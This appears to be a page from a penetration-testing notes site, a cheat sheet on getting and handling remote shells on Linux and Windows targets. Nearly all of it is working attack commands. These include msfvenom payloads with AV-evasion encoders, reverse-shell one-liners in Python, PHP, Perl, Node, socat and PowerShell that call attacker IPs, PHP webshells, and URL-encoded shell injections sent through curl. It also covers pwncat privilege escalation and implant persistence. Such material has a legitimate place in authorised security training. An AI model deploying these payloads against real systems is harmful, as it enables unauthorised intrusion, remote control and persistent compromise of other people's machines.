Shells

Always try different ports!

Reverse Shells

Automated reverse shell code:

Reverse Shell Generator (online)
Revshellgen (offline)

For Windows targets:

# Staged
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=80 -e x86/shikata_ga_nai -f exe -o staged_meterpreter_80.exe

# Non-staged
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.X LPORT=4444 -e x86/shikata_ga_nai -f exe -o non_staged_4444.exe

# Listener
$ sudo msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST tun0; set LPORT 80; set exitonsession false; run;"

# Execute
meterpreter > execute -f cmd.exe -a "/c start /b C:\\Windows\\Temp\\agent.exe -connect 10.10.14.5:443 -ignore-cert" -H

For Linux targets:

# Staged
$ msfvenom -p linux/x64/meterpreter/reverse_tcp  LHOST=10.10.14.5 LPORT=80 -f elf -o staged_meterpreter_80

# Listener
$ sudo msfconsole -q -x "use multi/handler; set payload linux/x64/meterpreter/reverse_tcp; set LHOST tun0; set LPORT 80; set exitonsession false; run;"

# Execute payload from the target (background, session-detached, silence output)
nohup ./staged_meterpreter_80 > /dev/null 2>&1 &

Create a socket, connect to the listener, duplicate the input, output, and error descriptors and call /bin/sh with subprocess:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.X.155",9090));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

The below commands instruct PHP to run (-r) the command within quotes:

php -r '$sock=fsockopen("192.168.X.155",9090);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("192.168.X.155",9090);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("192.168.X.155",9090);system("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("192.168.X.155",9090);passthru("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("192.168.X.155",9090);popen("/bin/sh -i <&3 >&3 2>&3", "r");'

The initial command injection places a malicious file in a world-writable directory (/var/tmp) that calls upon child_process and exec() functions:

echo "require('child_process').exec('nc -nv 192.168.X.155 9090 -e /bin/bash')" > /var/tmp/offsec.js ; node /var/tmp/offsec.js

Imports the Socket module, set up the socket, and pass it into a socket call. It then initializes the TCP connection (connect()), open channels for STDIN, STDOUT, and STDERR, and calls /bin/bash:

perl -e 'use Socket;$i="192.168.45.155";$p=9090;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Webshells

Kali has various webshells under /usr/share/webshells.

# Predefined
<?php system("whoami"); ?>
<?php preg_replace('/.*/e', 'system("whoami");', ''); ?>

# Dynamic
?php system($_GET['cmd']); ?>
<?php passthru($_GET['cmd']); ?>

Upgrade to a webshell:

# Initial payload
php -r '$sock=fsockopen("10.10.14.10",80);exec("/bin/sh -i <&3 >&3 2>&3");'

URL-encode and sent:

$ curl http://10.10.110.100:65000/wordpress/wp-content/plugins/akismet/akismet.php?c=php+-r+'$sock%3dfsockopen("10.10.14.10",80)%3bexec("/bin/sh+-i+<%263+>%263+2>%263")%3b'

URL-encoded PowerShell #3 from revshells:

curl http://172.16.1.11/discuss/ups/webshell.php?c=powershell%20-nop%20-W%20hidden%20-noni%20-ep%20bypass%20-c%20%22%24TCPClient%20%3D%20New-Object%20Net.Sockets.TCPClient%28%2710.10.14.10%27%2C%2053%29%3B%24NetworkStream%20%3D%20%24TCPClient.GetStream%28%29%3B%24StreamWriter%20%3D%20New-Object%20IO.StreamWriter%28%24NetworkStream%29%3Bfunction%20WriteToStream%20%28%24String%29%20%7B%5Bbyte%5B%5D%5D%24script%3ABuffer%20%3D%200..%24TCPClient.ReceiveBufferSize%20%7C%20%25%20%7B0%7D%3B%24StreamWriter.Write%28%24String%20%2B%20%27SHELL%3E%20%27%29%3B%24StreamWriter.Flush%28%29%7DWriteToStream%20%27%27%3Bwhile%28%28%24BytesRead%20%3D%20%24NetworkStream.Read%28%24Buffer%2C%200%2C%20%24Buffer.Length%29%29%20-gt%200%29%20%7B%24Command%20%3D%20%28%5Btext.encoding%5D%3A%3AUTF8%29.GetString%28%24Buffer%2C%200%2C%20%24BytesRead%20-%201%29%3B%24Output%20%3D%20try%20%7BInvoke-Expression%20%24Command%202%3E%261%20%7C%20Out-String%7D%20catch%20%7B%24_%20%7C%20Out-String%7DWriteToStream%20%28%24Output%29%7D%24StreamWriter.Close%28%29%22

Listeners

rlwrap is a utility that adds GNU Readline support—like command-line editing, history, and autocompletion—to applications that lack it. It's especially useful for older or minimal tools, and supports features like user-defined completion and input filtering.

rlwrap nc -lvnp <port>

Netcat is a versatile networking utility used for reading from and writing to network connections using TCP or UDP. It's commonly used for tasks like port scanning, file transfers, debugging, and creating simple servers or reverse shells.

nc -lvnp <port>

socat (short for SOcket CAT) is a powerful command-line tool that establishes two bidirectional data streams and transfers data between them. It supports a wide range of socket types (e.g., TCP, UDP, SSL, PTY, files) and is often used for port forwarding, tunneling, and debugging network services.

Set up the listener on the attacking host:

socat file:'tty',raw,echo=0 tcp-listen:4444

Send the reverse shell from the target:

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<ip>:4444

Download and send the revershe shell from the target in one-line:

wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444

pwncat is a post-exploitation tool designed for managing reverse shells more effectively by adding features like file upload/download, privilege escalation checks, and command history. It enhances basic shell access with automation, persistence, and scripting capabilities for penetration testers and red teamers.

# General syntax
[protocol://][user[:password]]@[host:][port][?arg1=value&arg2=value]

Set up the listener on the attacking host:

# Pwncat syntax
pwncat-cs bind://0.0.0.0:<port>

# nc syntax
pwncat-cs -lp <port>

# Encrypt traffic
pwncat-cs ssl-bind://0.0.0.0:<port>

Connect to a bind shell:

# Pwncat syntax
pwncat-cs connect://<ip:port>

# nc syntax
pwncat-cs <ip>:<port>

# Encrypt traffic
pwncat-cs ssl-connect://<ip>:<port>

Connect to a remote SSH server:

# Via ssh
pwncat-cs "ssh://<user>:<pass>@<ip>

# ssh syntax
pwncat-cs <user>@<ip>

# Key authentication
pwncat-cs -i ./id_rsa <user>@<ip>

Connect to a Windows target:

# Full connection string
pwncat-cs -m windows connect://192.168.1.1:4444

# nc syntax
pwncat-cs -m windows 192.168.1.1 4444

Switch between local and remote modes:

# CTRL+D
(local) pwncat$

# CTRL+D
(remote) www-data@p-web-02.acme-infinity-servers.com:/var/www/html$

# CTRL+D
(local) pwncat$

File transfers:

# Download a file
download /etc/hosts ./victim-hosts

# Upload a file
upload ./malicious.sh /tmp/definitely-not-malicious

Enumreate from local mode:

# List enumeration modules
(local) pwncat$ search enumerate*

# Use all modules
(local) pwncat$ run enumerate

# Generate a markdown report
(local) pwncat$ run report output=report.md

Escalate privileges:

# List escalation paths for any user
(local) pwncat$ escalate list

# List escalation paths to the specified user
(local) pwncat$ escalate list -u <user>

# Escalate to root
(local) pwncat$ escalate run

# Escalate to the specified user
(local) pwncat$ escalate run -u <user>

Persistence:

# List implant methods
(local) pwncat$ search implant*

# List installed implants
(local) pwncat$ run implant list

# Escalate using an installed implant
(local) pwncat$ run implant escalate

# Remove implant
(local) pwncat$ run implant remove

# List all installed remote implants
pwncat-cs --list

# Reconnect using the implanet ID
pwncat-cs <implant-id>

Upgrades

An upgraded shell gives us the ability to interrupt a process (CTRL+C), tab completion, clear the screen, up and down arrows, text editing, etc.
tty stands for teletype and pty stands for pseudoterminal!

# Check if Python3 is installed on the target
which python3

# Spawn Bash via Python3
python3 -c 'import pty;pty.spawn("/bin/bash")'

# Send tty to the backgroup (CTRL+Z) and check terminal's type and dimensions
echo $TERM && stty size

# Disable echo, send I/O straight through, and bring process to foreground
stty raw -echo; fg

# Press enter, reset terminal, and input the terminal type (xterm/screen)
reset

# Match tty's dimensions to the host's dimensions
stty rows 51 cols 209

# Set the TERM variable to the terminal's type
export TERM=xterm

# Check if Script is installed on the target
which script

# Spawn Bash via Script
script /dev/null -c /bin/bash

# Send tty to the backgroup (CTRL+Z) and check terminal's type and dimensions
echo $TERM && stty size

# Disable echo, send I/O straight through, and bring process to foreground
stty raw -echo; fg

# Press enter, reset terminal, and input the terminal type (xterm/screen)
reset

# Match tty's dimensions to the host's dimensions
stty rows 51 cols 209

# Set the TERM variable to the terminal's type
export TERM=xterm

An upgraded shell can be spawn right away if socat is on the target host.

Set up a listener from the attacking host:

socat file:$(tty),raw,echo=0 tcp-listen:1337

On the target host:

# Check if socat exists
which socat

# Send the reverse shell
socat exec:'bash -li',pty,stderr tcp:<attacker-ip>:<port>

Restricted Shells

See here: Restricted Linux Shell Escaping Techniques

PreviousText Processing NextFile Transfers

Last updated 5 months ago

Was this helpful?